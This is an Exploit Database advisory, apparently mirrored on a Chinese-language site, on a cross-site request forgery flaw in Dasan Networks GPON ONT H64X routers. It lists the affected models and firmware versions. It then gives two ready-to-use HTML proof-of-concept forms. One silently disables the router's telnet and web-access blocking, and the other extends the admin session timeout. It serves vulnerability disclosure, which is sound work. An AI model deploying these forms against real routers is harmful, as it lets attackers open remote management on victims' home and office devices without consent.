Dasan Networks GPON ONT WiFi Router H64X Series – Cross-Site Request Forgery

• Exploit Database
• 12 阅读

• 作者： LiquidWorm
  日期： 2017-07-13
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/42321/

• Dasan Networks GPON ONT WiFi Router H64X Series Cross-Site Request Forgery
  
  
  Vendor: Dasan Networks
  Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu
  Affected version: Model: H640GR-02
   H640GV-03
   H640GW-02
   H640RW-02
   H645G
   Firmware: 3.03p1-1145
   3.03-1144-01
   3.02p2-1141
   2.77p1-1125
   2.77-1115
   2.76-9999
   2.76-1101
   2.67-1070
   2.45-1045
  
  Summary: H64xx is comprised of one G-PON uplink port and four ports
  of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It
  helps service providers to extend their core optical network all the
  way to their subscribers, eliminating bandwidth bottlenecks in the
  last mile. H64xx is integrated device that provide the high quality
  Internet, telephony service (VoIP) and IPTV or OTT content for home
  or office. H64xx enable the subscribers to make a phone call whose
  quality is equal to PSTN at competitive price, and enjoy the high
  quality resolution live video and service such as VoD or High Speed
  Internet.
  
  Desc: The application interface allows users to perform certain actions
  via HTTP requests without performing any validity checks to verify the
  requests. This can be exploited to perform certain, if not all actions
  with administrative privileges if a logged-in user visits a malicious
  web site.
  
  Tested on: Server: lighttpd/1.4.31
   Server: DasanNetwork Solution
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2017-5422
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5422.php
  
  
  19.05.2017
  
  --
  
  
  Enable telnet access (disable telnet blocking):
  Enable web access (disable web blocking):
  -----------------------------------------------
  
  <html>
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://192.168.0.1:8080/cgi-bin/remote_mgmt_action.cgi" method="POST">
  <input type="hidden" name="rdoIPhost2TelnetBlocking" value="0" />
  <input type="hidden" name="rdoIPhost2WebBlocking" value="0" />
  <input type="hidden" name="waiting&#95;action" value="1" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>
  
  
  
  Increase session timeout (0: disable, min: 1, max: 60):
  -------------------------------------------------------
  
  <html>
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://192.168.0.1:8080/cgi-bin/websetting_action.cgi" method="POST">
  <input type="hidden" name="sessionTimeout" value="60" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>